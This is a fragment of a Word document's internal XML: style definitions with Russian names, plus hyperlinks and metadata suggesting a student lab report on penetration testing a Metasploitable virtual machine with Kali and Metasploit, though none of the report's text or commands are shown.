    <w:name w:val="header"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009F5C8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9F5C88"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a9">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="aa"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009F5C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9F5C88"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ab">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="ac"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008905A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8905AC"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a0">
    <w:name w:val="Списочек"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="ad"/>
    <w:qFormat/>
    <w:rsid w:val="004F417F"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:ind w:left="0" w:firstLine="709"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ae">
    <w:name w:val="Коммент"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="af"/>
    <w:qFormat/>
    <w:rsid w:val="00971FDA"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="FF0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ad">
    <w:name w:val="Списочек Знак"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="a0"/>
    <w:rsid w:val="004F417F"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af">
    <w:name w:val="Коммент Знак"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="ae"/>
    <w:rsid w:val="00971FDA"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:color w:val="FF0000"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="af0">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a3"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00271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2"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D706A0"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="af2">
    <w:name w:val="Вузик_таблица"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="af3"/>
    <w:qFormat/>
    <w:rsid w:val="00501556"/>
    <w:pPr>
      <w:ind w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af3">
    <w:name w:val="Вузик_таблица Знак"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="af2"/>
    <w:rsid w:val="00501556"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a">
    <w:name w:val="Вузик_список"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="af4"/>
    <w:qFormat/>
    <w:rsid w:val="00636E7E"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:ind w:left="0" w:firstLine="709"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af4">
    <w:name w:val="Вузик_список Знак"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="a"/>
    <w:rsid w:val="00636E7E"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="af5">
    <w:name w:val="Вузик"/>
    <w:rsid w:val="00DF5486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ableContents">
    <w:name w:val="Table Contents"/>
    <w:basedOn w:val="a1"/>
    <w:rsid w:val="00DF5486"/>
    <w:pPr>
      <w:suppressLineNumbers/>
      <w:suppressAutoHyphens/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left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character" w:styleId="af6">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="a2"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00852AC9"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af7">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="af8"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00852AC9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2"/>
    <w:link w:val="af7"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00852AC9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852AC9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852AC9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2"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00070BA2"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="afc">
    <w:name w:val="диссертация"/>
    <w:basedOn w:val="afd"/>
    <w:rsid w:val="003E49E7"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4820"/>
        <w:tab w:val="right" w:pos="9072"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="0" w:firstLine="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:szCs w:val="28"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Style4">
    <w:name w:val="Style4"/>
    <w:basedOn w:val="a1"/>
    <w:rsid w:val="003E49E7"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:line="322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1"/>
    <w:rsid w:val="003E49E7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7">
    <w:name w:val="Font Style17"/>
    <w:rsid w:val="003E49E7"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="afd">
    <w:name w:val="Body Text Indent"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="afe"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003E49E7"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:ind w:left="283"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="afe">
    <w:name w:val="Основной текст с отступом Знак"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="afd"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="003E49E7"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="1">
    <w:name w:val="Неразрешенное упоминание1"/>
    <w:basedOn w:val="a2"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00495D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01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37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3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s://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/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hyperlink" Target="https://www.kali.org/downloads/" TargetMode="Externa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cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687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ourceforge.net/projects/metasploitable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192.168.56.103/phpinfo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1</Pages>
  <Words>1898</Words>
  <Characters>10819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Ruslan</cp:lastModifiedBy>
  <cp:revision>2190</cp:revision>
  <cp:lastPrinted>2019-05-27T01:42:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-10-07T19:44:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-02-02T11:27:00Z</dcterms:modified>
</cp:coreProperties>
</file>